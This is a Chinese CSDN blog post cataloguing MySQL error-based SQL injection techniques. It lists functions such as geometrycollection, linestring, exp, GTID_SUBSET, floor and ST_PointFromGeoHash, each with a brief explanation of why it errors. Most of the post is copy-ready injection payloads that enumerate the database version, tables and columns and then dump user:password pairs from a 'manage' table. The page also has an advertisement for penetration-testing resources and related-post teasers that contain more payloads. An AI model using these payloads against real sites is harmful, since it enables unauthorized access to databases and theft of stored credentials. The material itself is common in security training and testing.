报错注入函数指南

已于 2022-12-09 12:13:03 修改
阅读量2.1k 收藏 8
点赞数 2
分类专栏: sql注入 文章标签: sql
于 2021-05-01 22:27:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28624871/article/details/116331183
版权

1. geometrycollection() mysql版本5.5

(1)函数解释:

GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。

(2)官方文档中举例的用法如下:
GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))

(3)报错原因:

因为MYSQL无法使用这样的字符串画出图形,所以报错

#获取版本信息

1') and geometrycollection((select * from(select * from(select version())a)b)); %23

在这里插入图片描述

#获取当前表名

1') and geometrycollection((select * from(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)); %23

在这里插入图片描述

#获取manage表里的段名

1') and geometrycollection((select * from(select * from(select column_name from information_schema.columns where table_name='manage' limit 0,1)a)b)); %23

在这里插入图片描述

#获取字段里的数据

1') and geometrycollection((select * from(select * from(select distinct concat(0x23,user,0x2a,password,0x23,name,0x23) FROM manage limit 0,1)a)b)); %23

在这里插入图片描述

2. multipoint() mysql版本5.5


(1)函数解释:
MultiPoint是一种由Point元素构成的几何对象集合。这些点未以任何方式连接或排序。

(2)报错原因:
同样是因为无法使用字符串画出图形与geometrycollection类似

#获取版本信息

1') and multipoint((select * from(select * from(select version())a)b)); %23

在这里插入图片描述

#获取当前表名

1') and multipoint((select * from(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)); %23

在这里插入图片描述

#获取manage表里的段名

1') and multipoint((select * from(select * from(select column_name from information_schema.columns where table_name='manage' limit 0,1)a)b))

在这里插入图片描述

#获取字段里的数据

1)' and multipoint((select * from(select * from(select distinct concat(0x23,user,0x2a,password,0x23,name,0x23) FROM manage limit 0,1)a)b)); %23

在这里插入图片描述

3. polygon()

polygon来自希腊。 “Poly” 意味 “many” , “gon” 意味 “angle”.
Polygon是代表多边几何对象的平面Surface。它由单个外部边界以及0或多个内部边界定义,其中,每个内部边界定义为Polygon中的1个孔。

') or polygon((select * from(select * from(select (SELECT GROUP_CONCAT(user,':',password) from manage))asd)asd))--+

4. mutipolygon()

') or multipolygon((select * from(select * from(select (SELECT GROUP_CONCAT(user,':',password) from manage))asd)asd))--+


在这里插入图片描述

5. linestring

报错原理:
mysql的有些几何函数( 例如geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring() )对参数要求为几何数据,若不满足要求则会报错,适用于5.1-5.5版本 (5.0.中存在但是不会报错)

#查询数据库名称

1') and linestring((select * from(select * from(select database())a)b))--+;

在这里插入图片描述

#获取表数据

1') and  linestring((select * from(select * from (select table_name from information_schema.tables where table_schema=database() limit 6,1)a)b))--+;

在这里插入图片描述

#获取manage里的段名

1') and linestring((select * from(select * from (select column_name from information_schema.columns where table_name = 'manage' limit 0,1)a)b))--+;

在这里插入图片描述

#获取字段数据

1') or linestring((select * from(select * from (select group_concat(user,':',`password`) from manage limit 0,32)a)b))--+;

在这里插入图片描述

6. multilinestring

【----帮助安全学习,所有资源获取处----】
①18份渗透测试电子书
②安全攻防300页笔记
③30份安全攻防面试指南
④安全红队渗透工具包
⑤网络安全必备书籍
⑥99个漏洞实战案例

#查询数据库名称

1') and multilinestring((select * from(select * from(select database())a)b))--+;

在这里插入图片描述

#获取表数据

1') and multilinestring((select * from(select * from (select table_name from information_schema.tables where table_schema=database() limit 6,1)a)b))--+;

在这里插入图片描述

#获取manage里的段名

1') and multilinestring((select * from(select * from (select column_name from information_schema.columns where table_name = 'manage' limit 0,1)a)b))--+;

在这里插入图片描述

#获取字段数据

1') or  multilinestring((select * from(select * from (select group_concat(user,':',`password`) from manage limit 0,32)a)b))--+;

在这里插入图片描述

7. exp()

exp(x)       返回 e 的 x 次方

当 数据过大 溢出时报错,即 x > 709

注入payload

mail=') or exp(~(select * from (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e))) as asd))--+


#关于 as asd
进行嵌套查询的时候子查询出来的的结果是作为一个派生表来进行上一级的查询的,所以子查询的结果必须要有一个别名
在这里插入图片描述

8. ST.LatFromGeoHash()(mysql>=5.7.x)


#payload

') or ST_LatFromGeoHash((select * from(select * from(select (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e))))a)b))--+

9. ST.LongFromGeoHash(mysql>=5.7.x)()


#payload
#同 8 ,都使用了嵌套查询

') or ST_LongFromGeoHash((select * from(select * from(select (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e))))a)b))--+

在这里插入图片描述

10. GTID (MySQL >= 5.6.X - 显错<=200)

0x01 GTID

GTID是MySQL数据库每次提交事务后生成的一个全局事务标识符,GTID不仅在本服务器上是唯一的,其在复制拓扑中也是唯一的

GTID的表现形式 -> GTID =
source_id:transaction_id其中source_id一般为数据库的uuid,transaction_id为事务ID,从1开始3E11FA47-71CA-11E1-9E33-C80AA9429562:23如上面的GTID可以看出该事务为UUID为3E11FA47-71CA-11E1-9E33-C80AA9429562的数据库的23号事务

GTID集合(一组全局事务标识符):
GTID集合为多个单GTID和一个范围内GTID的集合,他主要用于如下地方

  • gtid_executed 系统变量
  • gtid_purged系统变量
  • GTID_SUBSET() 和 GTID_SUBTRACT()函数

格式如下:

3E11FA47-71CA-11E1-9E33-C80AA9429562:1-5

它代表uuid为3E11FA47-71CA-11E1-9E33-C80AA9429562的服务器的1到5号事务
也可以是这样

3E11FA47-71CA-11E1-9E33-C80AA9429562:1-3:11:47-49

他代表该服务器的1到3号,11号和47到49号事务

0X02 函数详解

GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错

  1. GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)
  2. GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)
    正常情况如下

GTID_SUBSET(‘3E11FA47-71CA-11E1-9E33-C80AA9429562:23’,‘3E11FA47-71CA-11E1-9E33-C80AA9429562:21-57’)GTID_SUBTRACT(‘3E11FA47-71CA-11E1-9E33-C80AA9429562:21-57’,‘3E11FA47-71CA-11E1-9E33-C80AA9429562:20-25’)

0x03 注入过程( payload )

GTID_SUBSET函数

') or gtid_subset(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e),1)--+


GTID_SUBTRACT

') or gtid_subtract(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from manage),0x7e),1)--+

在这里插入图片描述

函数都是那样,只是适用的版本不同

11. floor(8.x>mysql>5.0)


#获取数据库版本信息

')or (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

在这里插入图片描述

#获取当前数据库

')or (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

在这里插入图片描述

#获取表数据

')or (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='test' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

在这里插入图片描述在这里插入图片描述

#获取manage表里的段名

')or (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name = 'manage' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

在这里插入图片描述

#获取字段里面的数据

1)获取数据的前部分

')or (select 1 from (select count(*),concat(mid(concat(0x23,(select group_concat(user,':',`password`) from manage),0x23),1,32),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ [前部分]

在这里插入图片描述

2)获取数据的后部分

')or (select 1 from (select count(*),concat(mid(concat(0x23,(select group_concat(user,':',`password`) from manage),0x23),26,32),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ [后部分]

在这里插入图片描述在这里插入图片描述

12. ST_Pointfromgeohash (mysql>5.7)


#获取数据库版本信息

')or  ST_PointFromGeoHash(version(),1)--+

在这里插入图片描述

#获取表数据

')or  ST_PointFromGeoHash((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)--+

在这里插入图片描述

#获取manage表里的段名

')or  ST_PointFromGeoHash((select column_name from information_schema.columns where table_name = 'manage' limit 0,1),1)--+

在这里插入图片描述

#获取字段里面的数据

')or  ST_PointFromGeoHash((concat(0x23,(select group_concat(user,':',`password`) from manage),0x23)),1)--+

在这里插入图片描述

十三年*
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全:SQL注入之报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2130
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
函数解题指南
02-27
实变函数的解题技巧, 配合周民强的实变函数论食用效果更佳
JS函数式编程指南
05-01
JS函数式编程指南
函数式JavaScript编程指南
10-31
函数式JavaScript编程指南
MySQL GTID函数
ctlongs的博客
12-17 1105
名称 描述 GTID_SUBSET() 如果子集中的所有GTID也在集合中,则返回true;否则就错了。 GTID_SUBTRACT() 返回集合中不在子集中的所有GTID。 WAIT_FOR_EXECUTED_GTID_SET() 等待在副本上执行给定的GTID。 WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS() 使用WAIT_FOR_EXECUTED_GTID_SET()。 mysql> SELECT GTID_SUBSET
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
报错注入常用函数
qq_43238111的博客
05-19 3819
常用的三种报错函数 1.原理 在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息, 在语法发生错误会输出在前端,从而从报错信息中获取设定的信息。 select/insert/update/delete 都可以使用报错来获取信息。 2.步骤 第一步:先判断是否存在漏洞 第二步:构造错误的语法,使用对应的报错函数: updatexml(),extractvalue(),floor() ,exp() 第三步:爆表名 第四步:爆字段 第五步:爆数据名 第六步:报数据值 3.函数
sql注入(6)报错注入
c10udz的博客
05-11 4770
报错注入七大常用函数
weixin_54217950的博客
02-15 5500
报错注入七大大常用函数 1.ST_LatFromGeoHash()(mysql>=5.7.x) and ST_LatFromGeoHash(concat(0x7e,(),0x7e))--+ 2.ST_LongFromGeoHash(mysql>=5.7.x) 同 8 ,都使用了嵌套查询 and ST_LongFromGeoHash(concat(0x7e,(),0x7e))--+ 3.GTID (MySQL >= 5.6.X - 显错<=200) 0x01 GTID GTID是M
报错注入常用报错函数总结
qq_43609884的博客
06-13 1851
sql注入
SQL注入-报错注入
m0_72125469的博客
11-24 588
SQL注入系列-报错注入
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
Eccharts加载geojson环形GeometryCollection格式的解决方案:Cannot read property ‘length‘ of undefined
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-25 1064
当echarts加载通过mapshaper合并后的geojson格式,会出现错误提示:Uncaught TypeError: Cannot read property 'length' of undefined 项目需求 在阿里Datav下载标准的geojson格式数据后,发现部分区域本身是一个整体,出现环形区域,通过分割线将其划成多个部分,影响地图的可视化效果。 通过mapshaper合并后的数据格式为环形格式GeometryCollection,该格式无法正常加载 解决方案 手动调整格式,标准格
SQL注入:报错注入
最新发布
qq_68163788的博客
01-27 1286
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2724
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
MYSQL 通过GeometryCollection()报错注入
Ciyaso的博客
01-18 2076
函数解释 GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。对GeometryCollection的元素无任何限制,但下面介绍的GeometryCollection的子类会限制其成员。这类限制可能基于: 元素类型(例如,MultiPoint可能仅包含Point元素)。 维数 对元素间空间交迭程度的限制 官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 1
echarts 使用geojson数据展示 GeometryCollection出错怎么办?
Aurora_juan的博客
04-12 1758
echarts4和echarts5都存在这个问题 对比geojson数据发现,因为数据类型中有GeometryCollection存在。生成的地图里有一个区域为两块不连续的地图块,所以生成的geoJson中此区域的geometry.type===GeometryCollection 解决方法 修改源码 node_modules\echarts\lib\coord\geo\parseGeoJson.js 116行 export default function parseGeoJSON(geoJson, n
MySQL --- 函数大全3
qq_57151931的博客
12-12 1315
MySQL --- 函数大全3
十种MYSQL显错注入原理讲解(二)
weixin_38023368的博客
09-04 357
1、geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 函数讲解:   GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。对GeometryCollection的元素无任何限制,但下
floor()函数用在报错注入的原理
05-24
报错注入中,我们可以通过构造恶意的输入,使得数据库执行的 SQL 语句出现错误,从而使得应用程序返回错误信息。而在利用报错注入获取数据时,我们通常会使用 floor() 函数。 floor() 函数是一个数学函数,用于向下取整,即将一个数值向下舍入到最接近它的小于等于该数值的整数。在报错注入中,我们可以构造一个带有错误的 SQL 语句,例如: ``` SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM users) = floor(rand()*2) ``` 在这个 SQL 语句中,我们使用了 floor() 函数将随机数 rand() 取整,如果随机数小于 0.5,那么 floor() 函数返回 0,否则返回 1。如果这个查询语句执行时出现错误,那么应用程序就会返回错误信息,从而我们可以得知随机数的大小,从而继续进行报错注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值